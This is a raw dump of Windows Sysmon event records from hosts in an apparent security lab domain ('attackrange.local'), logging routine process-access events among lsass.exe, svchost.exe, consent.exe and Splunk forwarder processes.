07:51:54.818{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.818{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.687{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.687{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x8000000000000000807499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:54.260{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86E80AB071636491CA308ED5E2D72F30,SHA256=55C297B26A82F074700071D9113886499BA97A0332646E0CF8314EC23318AC42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.187{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F49A-60EB-2E7D-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.171{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-2E7D-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F49A-60EB-2E7D-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.172{466BC892-F49A-60EB-2E7D-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001048726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.056{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001048725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.056{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
